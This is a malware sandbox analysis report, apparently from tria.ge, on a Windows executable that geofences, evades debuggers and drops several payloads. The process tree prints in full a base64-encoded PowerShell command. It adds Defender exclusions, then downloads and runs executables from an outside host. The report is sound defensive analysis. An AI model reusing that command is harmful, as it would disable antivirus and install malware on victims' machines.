Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
16s -
max time network
29s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
submitted
06/04/2024, 01:01
Static task
static1
Behavioral task
behavioral1
Sample
026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe
Resource
win10v2004-20240226-en
General
-
Target
026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe
-
Size
2.4MB
-
MD5
f5ae4fdb7579db408cc119c7df5ba699
-
SHA1
7119c29754409ab879eae0548c3c24395c27e16e
-
SHA256
026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608
-
SHA512
445d2a66100af7a1b7f85e8cb0f6c06af0ae436d514d818c102f81ffa4e92984353f0635d1aa7121e832efda642d4843e0d87e84819144dd356c9ffe99bcfb5f
-
SSDEEP
49152:MajGm3M0mm2dUE5qMsS5SeBtvGz68gNR0T3vRs+1FXclTbVzi:Maj1vmm0fsSQm8OA3vRLbclTbVW
Malware Config
Signatures
-
Detects executables manipulated with Fody 2 IoCs
resource yara_rule behavioral2/files/0x000c00000001e36d-62.dat INDICATOR_EXE_Packed_Fody behavioral2/memory/4548-78-0x0000020588230000-0x0000020588328000-memory.dmp INDICATOR_EXE_Packed_Fody -
Detects executables packed with unregistered version of .NET Reactor 1 IoCs
resource yara_rule behavioral2/files/0x000c000000023112-103.dat INDICATOR_EXE_Packed_DotNetReactor -
Blocklisted process makes network request 1 IoCs
flow pid Process 15 216 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 15 216 powershell.exe 15 216 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation 026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation conhostgm.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation cmHypersurrogatesavesDhcp.exe -
Executes dropped EXE 4 IoCs
pid Process 4548 CMLiteInstaller.exe 1004 cmHypersurrogatesavesDhcp.exe 3724 conhostgm.exe 3316 .conhostgm.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4380 026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe 4380 026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmHypersurrogatesavesDhcp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language conhostgm.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS CMLiteInstaller.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer CMLiteInstaller.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion CMLiteInstaller.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 216 powershell.exe 216 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 216 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4380 026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4380 wrote to memory of 216 4380 026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe 88 PID 4380 wrote to memory of 216 4380 026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe 88 PID 4380 wrote to memory of 216 4380 026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe 88 PID 216 wrote to memory of 4548 216 powershell.exe 94 PID 216 wrote to memory of 4548 216 powershell.exe 94 PID 216 wrote to memory of 1004 216 powershell.exe 95 PID 216 wrote to memory of 1004 216 powershell.exe 95 PID 216 wrote to memory of 1004 216 powershell.exe 95 PID 216 wrote to memory of 3724 216 powershell.exe 96 PID 216 wrote to memory of 3724 216 powershell.exe 96 PID 216 wrote to memory of 3724 216 powershell.exe 96 PID 3724 wrote to memory of 3316 3724 conhostgm.exe 98 PID 3724 wrote to memory of 3316 3724 conhostgm.exe 98 PID 1004 wrote to memory of 2652 1004 cmHypersurrogatesavesDhcp.exe 99 PID 1004 wrote to memory of 2652 1004 cmHypersurrogatesavesDhcp.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe"C:\Users\Admin\AppData\Local\Temp\026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYQBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB4AHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBjAGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcALAAgADwAIwBuAGgAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZgBnACMAPgAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB5AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQApADwAIwBqAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwBjAG0ASAB5AHAAZQByAHMAdQByAHIAbwBnAGEAdABlAHMAYQB2AGUAcwBEAGgAYwBwAC4AZQB4AGUAJwAsACAAPAAjAGQAagB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB3AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAagBqAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBtAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQApADwAIwBpAHkAZwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AbQAvAGMAbwBuAGgAbwBzAHQAZwBtAC4AZQB4AGUAJwAsACAAPAAjAG0AYQBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB6AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB4AG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABnAG0ALgBlAHgAZQAnACkAKQA8ACMAYQBxAGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegBmAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwBhAGcAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQA8ACMAaABwAGMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBoAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHgAeABzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbQBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAPAAjAHQAZABlACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAawB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGcAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AGcAbQAuAGUAeABlACcAKQA8ACMAYQBuAHYAIwA+AA=="2⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe"C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe"3⤵
- Executes dropped EXE
- Enumerates system info in registry
PID:4548
-
-
C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe"C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe"C:\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe"4⤵PID:2652
-
-
-
C:\Users\Admin\AppData\Roaming\conhostgm.exe"C:\Users\Admin\AppData\Roaming\conhostgm.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Users\Admin\AppData\Roaming\.conhostgm.exe"C:\Users\Admin\AppData\Roaming\.conhostgm.exe"4⤵
- Executes dropped EXE
PID:3316
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
977KB
MD502ea34533272f916fb52990a45917913
SHA1bd68a7c84b7d7a65ab19419ddf6a2a2b44fda0a4
SHA2566dd45a770648da5f5996ac7b28f604493b44f8b1ba7458cf60d3a1ab7cf18590
SHA512352521214ed922b0e3331559d0c6b2af0fc55e4b4077dcf83dbeec08a8f59820c98bbbd795cdd8e2430c835ba7fbb6b19c34572762c7cf6359de05b99ef019a7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16.2MB
MD56655d3087c95093aaa1721d7fc388102
SHA15b967293e7effe8df0e1c1576f1166e39caa9168
SHA25615c5858d9ebda747923f9017a9cc85ce8113ba908c2ae9964c358fbb7085497b
SHA512d3560470248811af98e8085d790ad31ce0939664b599c80072cea9db57cf1910955536276fe1787ecf6013ebadc13182f309f66912d01b6c0871a445c5b842b2
-
Filesize
4.1MB
MD517be4c3e660d6790cf257ac1d37cfed3
SHA15a9acd6a791ec8f51bd73ea21681da17ad63e41a
SHA256a57d4b57cdbed3d466f435129dc227625cba8a6238bab88f78cf8583ea2f0afb
SHA51245896bf23c82d666352857f71c9b32efa85468191bf719bf6a98c11ae239bccc244de6ac104e68f2a8fa32c96ee847baa311d99ea1b89af41505d626bcd0c302
-
Filesize
19.2MB
MD5dd212c880a5fd073da1ce9cc30fda639
SHA1fe6683154f4ca80dbe8ace46db23b3163ee13fc0
SHA256cc2fef68eab401d44c89733fe57a11543ef93c7f3805da3e2de5f0249d7bf8d4
SHA51273a390e6151bdf6b5b2f637dc0c7dd5e6f5cd0bc4e988ecc4a17c49509fbaa6157341ad7d2eb8e2b54d1fc91ca2b03d11c16490e3d0420ea9c54c50de6d55fc5
-
Filesize
2.7MB
MD5a019ace077ac382ccb8d83b19540926e
SHA1f113d7549d85855bec628c2e626c340f5380bd12
SHA256bb6075bd1a836e5ed1c92e1d0b10a2414509e5f634a33f502313bcf82ee498ae
SHA5127a1bbffe2f6938399840e56c305ef3c3f03182cb1eef3555ad63699f43f749ceb8def18e8124cd3f8382c51a02ba2cc9960089287b05c85b9f0a0ff7b7b94618
-
Filesize
2.9MB
MD5316fa77cc45d0802155448d648b417b4
SHA1c60be59c3df582030f3bbbf7c93e3f6110a38c82
SHA256dd248b4df3e5b9eac86bbe9fc6f7ef17b0d75738b601267b214a825783d0a2a1
SHA5124f1a4b71bc0d18dd6210c7b55736e2c43cf90f7ed700061a775ceecade3ef2b88c0e122769c5570e5bb2b8453deab6d5ff50ab73ff0fbb1cb9b3475be76c4da9